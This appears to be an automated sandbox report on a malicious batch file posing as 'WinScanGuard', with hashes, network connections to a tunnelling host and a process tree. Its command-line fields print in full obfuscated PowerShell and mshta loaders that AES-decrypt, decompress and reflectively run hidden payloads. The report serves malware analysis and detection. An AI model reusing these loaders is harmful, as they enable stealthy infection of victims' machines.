                                                                                                                  MD5:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  SHA1:F43D9BB316E30AE1A3494AC5B0624F6BEA1BF054
                                                                                                                  SHA-256:9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F
                                                                                                                  SHA-512:6A2FB055473033FD8FDB8868823442875B5B60C115031AAEDA688A35A092F6278E8687E2AE2B8DC097F8F3F35D23959757BF0C408274A2EF5F40DDFA4B5C851B
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./..%k.ovk.ovk.ovu..vi.ovb..va.ov..lwi.ov..kwq.ovk.nv.ov..nwn.ov..jwb.ov..bwb.ov..vj.ov..mwj.ovRichk.ov........................PE..d....A.~.........."..........^......@=.........@..........................................`.......... .......................................L...........}...p..........................T......................(..................`................................text............................... ..`.rdata.............................@..@.data...,....`.......L..............@....pdata.......p.......T..............@..@.rsrc....}.......~...^..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1835008
                                                                                                                  Entropy (8bit):4.466230233222637
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6144:2IXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNIdwBCswSb3:7XD94+WlLZMM6YFHC+3
                                                                                                                  MD5:E0CD6C1413187D844B701EBB6AAAD40E
                                                                                                                  SHA1:978C74EEEC15F6503A9474973E2E1BA166E1589F
                                                                                                                  SHA-256:D8B3F8F2DB986858DBA6C68B9D283B8D9AD1C6A132BC91331550D9D285625695
                                                                                                                  SHA-512:B23AA18E770612D2E5E68D324C0362AEB05A901937C54A9231B112CAB98E63EC1E3E5084200EA04DCE090D39D2939DDD555713DD7D3CD7805FFE3F0A284359FC
                                                                                                                  Malicious:false
                                                                                                                  Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..!.&..............................................................................................................................................................................................................................................................................................................................................eb..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  File type:ASCII text, with very long lines (4949), with CRLF line terminators
                                                                                                                  Entropy (8bit):6.034933568775613
                                                                                                                  TrID:
                                                                                                                    File name:WinScanGuard_v.2.1.bat
                                                                                                                    File size:13'030'371 bytes
                                                                                                                    MD5:1837a5f032a42228c0854fb83a8d12c8
                                                                                                                    SHA1:de434e8479dfbc102ac30428b69199009973d788
                                                                                                                    SHA256:13291c07421049ba4d39f521c3ae17923180ac5186d87952709c1fa775e39dd4
                                                                                                                    SHA512:622431f44f0359bcc0cbe0bc4cf51dba6d6bb1b8ce3b2cf575ad4ddc256d19f62686df87d8a26a761c3aefd920e5dfd399e28008e12296808aa7970562402470
                                                                                                                    SSDEEP:49152:uIKfaP4T0T7fSQYUwnEgLO3Grqx8MS/oGadv7tA5TPHFe7yq+Bg/KjyCy1HdnpGj:Y
                                                                                                                    TLSH:E0D6CFCBA3E9700AB8DA1741C0C5D5A5E15000845D9781FB9EF0B396999F8BBD87BC3B
                                                                                                                    File Content Preview:%NRDwNoMITDjScJrLHfdWcfCMBhRJAHkaLzgDIiAHJNfgnyKbncCmHpahPoufWDILQIHdboDWdWNPATWDWnUVEySUWylRoTiGFSPfpfAzZdHibKhvRpHhhlHRnkGcCjhKmGJfEqLqnUwYpirLPpAyLBXSLxpFXVxoxwwUABpZdPuLpgZFqvMKjiylhpTGAGRRXFbumWKNAYSwGLbcUkMbIkEMyImJgiYWxamjEgQTiyJKOCdUNojOrnJlBOwciB
                                                                                                                    Icon Hash:9686878b929a9886
                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Dec 3, 2023 16:55:43.520767927 CET4973622112192.168.2.4167.71.56.116
                                                                                                                    Dec 3, 2023 16:55:43.850575924 CET2211249736167.71.56.116192.168.2.4
                                                                                                                    Dec 3, 2023 16:55:43.850892067 CET4973622112192.168.2.4167.71.56.116
                                                                                                                    Dec 3, 2023 16:55:44.227205992 CET4973622112192.168.2.4167.71.56.116
                                                                                                                    Dec 3, 2023 16:55:44.574769020 CET2211249736167.71.56.116192.168.2.4
                                                                                                                    Dec 3, 2023 16:55:47.649981976 CET2211249736167.71.56.116192.168.2.4
                                                                                                                    Dec 3, 2023 16:55:49.322227955 CET4973722112192.168.2.4167.71.56.116
                                                                                                                    Dec 3, 2023 16:55:49.581300974 CET2211249737167.71.56.116192.168.2.4
                                                                                                                    Dec 3, 2023 16:55:49.581397057 CET4973722112192.168.2.4167.71.56.116
                                                                                                                    Dec 3, 2023 16:55:49.582201958 CET4973722112192.168.2.4167.71.56.116
                                                                                                                    Dec 3, 2023 16:55:49.838464022 CET2211249737167.71.56.116192.168.2.4
                                                                                                                    Dec 3, 2023 16:56:04.880826950 CET2211249737167.71.56.116192.168.2.4
                                                                                                                    Dec 3, 2023 16:56:04.880949974 CET4973722112192.168.2.4167.71.56.116
                                                                                                                    Dec 3, 2023 16:56:14.840202093 CET4973722112192.168.2.4167.71.56.116
                                                                                                                    Dec 3, 2023 16:56:15.099138021 CET2211249737167.71.56.116192.168.2.4
                                                                                                                    Dec 3, 2023 16:56:30.128767967 CET2211249737167.71.56.116192.168.2.4
                                                                                                                    Dec 3, 2023 16:56:30.128885984 CET4973722112192.168.2.4167.71.56.116
                                                                                                                    Dec 3, 2023 16:56:40.108650923 CET4973722112192.168.2.4167.71.56.116
                                                                                                                    Dec 3, 2023 16:56:40.383013964 CET2211249737167.71.56.116192.168.2.4
                                                                                                                    Dec 3, 2023 16:56:55.408804893 CET2211249737167.71.56.116192.168.2.4
                                                                                                                    Dec 3, 2023 16:56:55.408994913 CET4973722112192.168.2.4167.71.56.116
                                                                                                                    Dec 3, 2023 16:57:05.481062889 CET4973722112192.168.2.4167.71.56.116
                                                                                                                    Dec 3, 2023 16:57:05.745306969 CET2211249737167.71.56.116192.168.2.4
                                                                                                                    Dec 3, 2023 16:57:20.784871101 CET2211249737167.71.56.116192.168.2.4
                                                                                                                    Dec 3, 2023 16:57:20.785048962 CET4973722112192.168.2.4167.71.56.116
                                                                                                                    Dec 3, 2023 16:57:30.746467113 CET4973722112192.168.2.4167.71.56.116
                                                                                                                    Dec 3, 2023 16:57:31.006043911 CET2211249737167.71.56.116192.168.2.4
                                                                                                                    Dec 3, 2023 16:57:46.032910109 CET2211249737167.71.56.116192.168.2.4
                                                                                                                    Dec 3, 2023 16:57:46.032975912 CET4973722112192.168.2.4167.71.56.116
                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Dec 3, 2023 16:55:43.338063002 CET5965153192.168.2.41.1.1.1
                                                                                                                    Dec 3, 2023 16:55:43.500899076 CET53596511.1.1.1192.168.2.4
                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                    Dec 3, 2023 16:55:43.338063002 CET192.168.2.41.1.1.10xe5edStandard query (0)throbbing-mountain-09011.pktriot.netA (IP address)IN (0x0001)false
                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                    Dec 3, 2023 16:55:43.500899076 CET1.1.1.1192.168.2.40xe5edNo error (0)throbbing-mountain-09011.pktriot.neteu-central-7075.packetriot.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Dec 3, 2023 16:55:43.500899076 CET1.1.1.1192.168.2.40xe5edNo error (0)eu-central-7075.packetriot.net167.71.56.116A (IP address)IN (0x0001)false

                                                                                                                    Click to jump to process

                                                                                                                    Click to jump to process

                                                                                                                    Click to dive into process behavior distribution

                                                                                                                    Click to jump to process

                                                                                                                    Target ID:0
                                                                                                                    Start time:16:55:02
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\WinScanGuard_v.2.1.bat" "
                                                                                                                    Imagebase:0x7ff7c3030000
                                                                                                                    File size:289'792 bytes
                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:1
                                                                                                                    Start time:16:55:02
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:2
                                                                                                                    Start time:16:55:10
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"WinScanGuard_v.2.1.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function oLSgt($QHQwZ){ $FhDgh=[System.Security.Cryptography.Aes]::Create(); $FhDgh.Mode=[System.Security.Cryptography.CipherMode]::CBC; $FhDgh.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $FhDgh.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ONJSi5FjJzv4AOEMBvugvr4ituUVmgVNRnjeJyrP0WQ='); $FhDgh.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CLQNYwl0vsdfD4X+5YKrxQ=='); $SpFlB=$FhDgh.CreateDecryptor(); $return_var=$SpFlB.TransformFinalBlock($QHQwZ, 0, $QHQwZ.Length); $SpFlB.Dispose(); $FhDgh.Dispose(); $return_var;}function rnHmS($QHQwZ){ $WxVgK=New-Object System.IO.MemoryStream(,$QHQwZ); $bpCBe=New-Object System.IO.MemoryStream; $coUVU=New-Object System.IO.Compression.GZipStream($WxVgK, [IO.Compression.CompressionMode]::Decompress); $coUVU.CopyTo($bpCBe); $coUVU.Dispose(); $WxVgK.Dispose(); $bpCBe.Dispose(); $bpCBe.ToArray();}function ZAtIe($QHQwZ,$cjUqy){ $oSPmD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$QHQwZ); $xWTDt=$oSPmD.EntryPoint; $xWTDt.Invoke($null, $cjUqy);}$YlWDR=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\Desktop\WinScanGuard_v.2.1.bat').Split([Environment]::NewLine);foreach ($XUIQg in $YlWDR) { if ($XUIQg.StartsWith('SEROXEN')) { $sOgSv=$XUIQg.Substring(7); break; }}$ZErMU=[string[]]$sOgSv.Split('\');$tzgBc=rnHmS (oLSgt ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZErMU[0])));$TtDxt=rnHmS (oLSgt ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZErMU[1])));ZAtIe $TtDxt (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));ZAtIe $tzgBc (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
                                                                                                                    Imagebase:0x7ff60eaa0000
                                                                                                                    File size:452'608 bytes
                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000002.00000002.2138245203.0000020C8051D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000002.00000002.2138245203.0000020C81961000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Antivirus matches:
                                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                                    • Detection: 0%, Virustotal, Browse
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:6
                                                                                                                    Start time:16:55:25
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\System32\dllhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\System32\dllhost.exe /Processid:{17980c38-011a-4e2a-a8da-a3b9e80db269}
                                                                                                                    Imagebase:0x7ff70f330000
                                                                                                                    File size:21'312 bytes
                                                                                                                    MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:moderate
                                                                                                                    Has exited:true

                                                                                                                    Target ID:7
                                                                                                                    Start time:16:55:25
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\SysWOW64\dllhost.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\dllhost.exe /Processid:{6ee5d1df-df32-414a-8053-43a03a04def5}
                                                                                                                    Imagebase:0xf80000
                                                                                                                    File size:19'256 bytes
                                                                                                                    MD5 hash:6F3C9485F8F97AC04C8E43EF4463A68C
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:moderate
                                                                                                                    Has exited:true

                                                                                                                    Target ID:10
                                                                                                                    Start time:16:55:25
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7132 -s 144
                                                                                                                    Imagebase:0xf20000
                                                                                                                    File size:483'680 bytes
                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:13
                                                                                                                    Start time:16:55:30
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\$sxr-mshta.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-bWTLJBKbogHiYUerhoAr4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
                                                                                                                    Imagebase:0x7ff7142f0000
                                                                                                                    File size:14'848 bytes
                                                                                                                    MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Antivirus matches:
                                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                                    • Detection: 0%, Virustotal, Browse
                                                                                                                    Reputation:moderate
                                                                                                                    Has exited:false

                                                                                                                    Target ID:14
                                                                                                                    Start time:16:55:30
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\System32\dllhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\System32\dllhost.exe /Processid:{b60ad232-6d40-4822-9220-52a4d3050cb3}
                                                                                                                    Imagebase:0x7ff70f330000
                                                                                                                    File size:21'312 bytes
                                                                                                                    MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:moderate
                                                                                                                    Has exited:true

                                                                                                                    Target ID:15
                                                                                                                    Start time:16:55:30
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\SysWOW64\dllhost.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\dllhost.exe /Processid:{603825cb-58d6-4ab4-99a0-2fdb5cd309d6}
                                                                                                                    Imagebase:0xf80000
                                                                                                                    File size:19'256 bytes
                                                                                                                    MD5 hash:6F3C9485F8F97AC04C8E43EF4463A68C
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:moderate
                                                                                                                    Has exited:true

                                                                                                                    Target ID:16
                                                                                                                    Start time:16:55:31
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\$sxr-cmd.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\$sxr-cmd.exe" /c %$sxr-bWTLJBKbogHiYUerhoAr4312:&#<?=%
                                                                                                                    Imagebase:0x7ff6154f0000
                                                                                                                    File size:289'792 bytes
                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Antivirus matches:
                                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                                    • Detection: 0%, Virustotal, Browse
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    Target ID:17
                                                                                                                    Start time:16:55:31
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    Target ID:18
                                                                                                                    Start time:16:55:31
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\$sxr-powershell.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function ZXowG($YGfCS){ $HJBVM=[System.Security.Cryptography.Aes]::Create(); $HJBVM.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HJBVM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HJBVM.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc='); $HJBVM.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w=='); $SHNYR=$HJBVM.('rotpyrceDetaerC'[-1..-15] -join '')(); $ptoRz=$SHNYR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YGfCS, 0, $YGfCS.Length); $SHNYR.Dispose(); $HJBVM.Dispose(); $ptoRz;}function MiajR($YGfCS){ $VHZiJ=New-Object System.IO.MemoryStream(,$YGfCS); $MKYCr=New-Object System.IO.MemoryStream; $pphYy=New-Object System.IO.Compression.GZipStream($VHZiJ, [IO.Compression.CompressionMode]::Decompress); $pphYy.CopyTo($MKYCr); $pphYy.Dispose(); $VHZiJ.Dispose(); $MKYCr.Dispose(); $MKYCr.ToArray();}function DEttm($YGfCS,$ZtwIE){ $mZolj=[System.Reflection.Assembly]::Load([byte[]]$YGfCS); $lOFyP=$mZolj.EntryPoint; $lOFyP.Invoke($null, $ZtwIE);}$HJBVM1 = New-Object System.Security.Cryptography.AesManaged;$HJBVM1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$HJBVM1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$HJBVM1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc=');$HJBVM1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w==');$GhtEl = $HJBVM1.('rotpyrceDetaerC'[-1..-15] -join '')();$tSRUF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/drqfgtKhdXyibTYP3tLyQ==');$tSRUF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF, 0, $tSRUF.Length);$tSRUF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF);$tbgVF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uYhEUY/+HnwQeclFyB1FDUqtQym+nHVdwwfjEKKh6LU=');$tbgVF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tbgVF, 0, $tbgVF.Length);$tbgVF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tbgVF);$mjWsq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v2S4NwnXvXtvXwhesSwNIQ==');$mjWsq = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mjWsq, 0, $mjWsq.Length);$mjWsq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mjWsq);$iBFKh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RZnS/OPKxZu99whpuaUC1mhVovuCskWdCRfz1FlzhkQ9viPcHXWbSXtn8ebOdAixZCvIKg7kNsNJQfjixS10DgPnP1RgMFsS0Ufgfy1HhpeBrScxYLrFwuGlVdIKxKsNCNlET01ZQTP7t1afzsZuiFRyhdaoNNd/a48fSObOV6s0Dg4uz6IT5eoHk560k0oKDQhofXeJn4REmUW/Qa+OFgHhvk0nKSZmZIWIfiCOl824A/iJhUAIvvnXISy3KfqXbk9SxrWiI48yb3R5eHDU2SFOOdwj4/P9sUdFWqjTGEiXdZH4kVSXjz0XVe4ZYpD+he6+N8ebMZVScb8HKUN/+DzmXUfDtfwWV5MarCY6ZdmO2yJ4s2sbOzZsPvxKUwPa7yfFsYHuzQ4rPk9Yysf5MqWX04//4DGnhGl+/sl+WZ0=');$iBFKh = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBFKh, 0, $iBFKh.Length);$iBFKh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($iBFKh);$sRLEH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NPfQRzZslsp7LUVLS08LhQ==');$sRLEH = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sRLEH, 0, $sRLEH.Length);$sRLEH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sRLEH);$sLsEZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bw6rZXASWFOFrL4CLrePaw==');$sLsEZ = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sLsEZ, 0, $sLsEZ.Length);$sLsEZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sLsEZ);$SPFoS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QYOQkrgRiSqCZw4PoX3ndQ==');$SPFoS = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SPFoS, 0, $SPFoS.Length);$SPFoS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SPFoS);$xCumf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SdFQ7WIJndJ4NA0XksAXZg==');$xCumf = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xCumf, 0, $xCumf.Length);$xCumf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xCumf);$WAkXF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('AR4GvTa2A8uikK6+T2nKoQ==');$WAkXF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WAkXF, 0, $WAkXF.Length);$WAkXF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WAkXF);$tSRUF0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('L3o7gT8T96iY71qHMveksg==');$tSRUF0 = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF0, 0, $tSRUF0.Length);$tSRUF0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF0);$tSRUF1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('E8Y/0E3VS02vVNfuFqTGCw==');$tSRUF1 = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF1, 0, $tSRUF1.Length);$tSRUF1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF1);$tSRUF2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3ob3sb5+Bgi0uwQxb9HNKg==');$tSRUF2 = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF2, 0, $tSRUF2.Length);$tSRUF2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF2);$tSRUF3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('E46YnTPfmALJD+Ie1fVvGQ==');$tSRUF3 = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF3, 0, $tSRUF3.Length);$tSRUF3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF3);$GhtEl.Dispose();$HJBVM1.Dispose();if (@(get-process -ea silentlycontinue $tSRUF3).count -gt 1) {exit};$BcpNi = [Microsoft.Win32.Registry]::$xCumf.$SPFoS($tSRUF).$sLsEZ($tbgVF);$QCqEG=[string[]]$BcpNi.Split('\');$BPwjg=MiajR(ZXowG([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QCqEG[1])));DEttm $BPwjg (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$RLOOe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QCqEG[0]);$HJBVM = New-Object System.Security.Cryptography.AesManaged;$HJBVM.Mode = [System.Security.Cryptography.CipherMode]::CBC;$HJBVM.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$HJBVM.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc=');$HJBVM.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w==');$SHNYR = $HJBVM.('rotpyrceDetaerC'[-1..-15] -join '')();$RLOOe = $SHNYR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RLOOe, 0, $RLOOe.Length);$SHNYR.Dispose();$HJBVM.Dispose();$VHZiJ = New-Object System.IO.MemoryStream(, $RLOOe);$MKYCr = New-Object System.IO.MemoryStream;$pphYy = New-Object System.IO.Compression.GZipStream($VHZiJ, [IO.Compression.CompressionMode]::$tSRUF1);$pphYy.$WAkXF($MKYCr);$pphYy.Dispose();$VHZiJ.Dispose();$MKYCr.Dispose();$RLOOe = $MKYCr.ToArray();$jMAvT = $iBFKh | IEX;$mZolj = $jMAvT::$tSRUF2($RLOOe);$lOFyP = $mZolj.EntryPoint;$lOFyP.$tSRUF0($null, (, [string[]] ($mjWsq)))
                                                                                                                    Imagebase:0x7ff731020000
                                                                                                                    File size:452'608 bytes
